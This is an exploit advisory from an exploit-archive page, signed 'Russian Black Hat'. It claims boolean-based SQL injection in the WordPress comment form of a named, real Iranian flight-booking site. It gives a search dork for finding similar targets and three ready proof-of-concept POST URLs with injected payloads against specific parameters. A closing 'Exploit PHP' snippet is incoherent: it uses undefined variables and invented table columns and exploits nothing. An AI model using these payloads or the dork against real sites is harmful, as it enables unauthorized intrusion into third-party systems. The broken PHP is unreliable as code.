Share
## https://sploitus.com/exploit?id=PACKETSTORM:177988
This site which has a security problem with the SQL INJECTION Vulnerability "CWE-89".  
We have repeatedly reported to this site that it has a security problem and has ignored our report.  
We want to record this security issue  
  
#########################################################################################################################  
# #  
# Exploit Title : Site Flight agency airpol the Islamic Republic of Iran SQL INJECTION Vulnerability #  
# #  
# Author : E1.Coders #  
# #  
# Contact : E1.Coders [at] Mail [dot] RU #  
# #  
# Portal Link : https://flightio.com/ #  
# #  
# Security Risk : Medium #  
# #  
# Description : All target's IRanian AIRPOT websites #  
# #  
# DorK : "inurl:wp-comments-post.php%5Eauthor=" #  
# #  
#########################################################################################################################  
# #  
# Expl0iTs: #  
#  
# vuln type : SQLInjection  
#   
# refer address : https://flightio.com/blog/attractions/best-chahbahar-attractions/  
#   
# request type : POST  
#   
# action url : https://flightio.com/blog/wp-comments-post.php^author=6463106&submit=ارسال دیدگاه&comment_post_ID=64505&akismet_comment_nonce=385c7c306e&ak_js=98&comment=WCRTEXTAREATESTINPUT8462957&ak_hp_textarea=WCRTEXTAREATESTINPUT2557057&comment_parent=0  
#   
# parameter : comment_parent  
#   
# description : POST SQL INJECTION BooleanBased String  
#   
# POC : https://flightio.com/blog/wp-comments-post.php^author=6463106&submit=ارسال/**/دیدگاه&comment_post_ID=64505&akismet_comment_nonce=385c7c306e&ak_js=98&comment=WCRTEXTAREATESTINPUT8462957&ak_hp_textarea=WCRTEXTAREATESTINPUT2557057&comment_parent=0%27/**/aNd/**/7462200=7462200/**/aNd/**/%276199%27=%276199  
---------------------------------------  
#  
# Expl0iTs:   
# vuln type : SQLInjection  
#   
# refer address : https://flightio.com/blog/travel-tips/norouz-holiday-trips-in-iran/  
#   
# request type : POST  
#   
# action url : https://flightio.com/blog/wp-comments-post.php^author=9640811&submit=ارسال دیدگاه&comment_post_ID=3173&comment_parent=0&akismet_comment_nonce=709cdb3e84&ak_js=154&comment=WCRTEXTAREATESTINPUT9791191&ak_hp_textarea=WCRTEXTAREATESTINPUT8111319  
#   
# parameter : ak_hp_textarea  
#   
# description : POST SQL INJECTION BooleanBased String  
#   
# POC : https://flightio.com/blog/wp-comments-post.php^author=9640811&submit=ارسال/**/دیدگاه&comment_post_ID=3173&comment_parent=0&akismet_comment_nonce=709cdb3e84&ak_js=154&comment=WCRTEXTAREATESTINPUT9791191&ak_hp_textarea=WCRTEXTAREATESTINPUT8111319%27)/**/aNd/**/4442431=4442431/**/aNd/**/(%276199%27)=(%276199  
------------------------------------------------  
# # Expl0iTs:   
# vuln type : SQLInjection  
#   
# refer address : https://flightio.com/blog/travel-tips/hormuz-island-travel-guide/  
#   
# request type : POST  
#   
# action url : https://flightio.com/blog/wp-comments-post.php^submit=ارسال دیدگاه&comment_post_ID=64267&comment_parent=0&akismet_comment_nonce=57b7866a2c&ak_js=15&comment=WCRTEXTAREATESTINPUT9752286&ak_hp_textarea=WCRTEXTAREATESTINPUT5571116&author=99999999  
#   
# parameter : author  
#   
# description : POST SQL INJECTION BooleanBased String  
#   
# POC : https://flightio.com/blog/wp-comments-post.php^submit=ارسال/**/دیدگاه&comment_post_ID=64267&comment_parent=0&akismet_comment_nonce=57b7866a2c&ak_js=15&comment=WCRTEXTAREATESTINPUT9752286&ak_hp_textarea=WCRTEXTAREATESTINPUT5571116&author=99999999%27)/**/oR/**/6197419=6197419/**/aNd/**/(%276199%27)=(%276199 #  
#########################################################################################################################  
# #  
# | Security Is JOCK | #  
# #  
# | Russian Black Hat | #  
# #  
#########################################################################################################################  
  
  
Exploit PHP :  
  
global $wpdb;  
  
$author = '99999999';  
$comment = 'WCRTEXTAREATESTINPUT9752286';  
$ak_hp_textarea = 'WCRTEXTAREATESTINPUT5571116';  
  
$wpdb->prepare(  
"INSERT INTO wp_comments (comment_post_ID, comment_author, comment_content, comment_parent, akismet_comment_nonce, ak_js, author) VALUES (%d, %s, %s, %d, %s, %d, %d)",  
$comment_post_ID, $comment_author, $comment_content, $comment_parent, $akismet_comment_nonce, $ak_js, $author  
);  
  
$wpdb->insert('wp_comments', array(  
'comment_post_ID' => $comment_post_ID,  
'comment_author' => $comment_author,  
'comment_content' => $comment_content,  
'comment_parent' => $comment_parent,  
'akismet_comment_nonce' => $akismet_comment_nonce,  
'ak_js' => $ak_js,  
'author' => $author  
));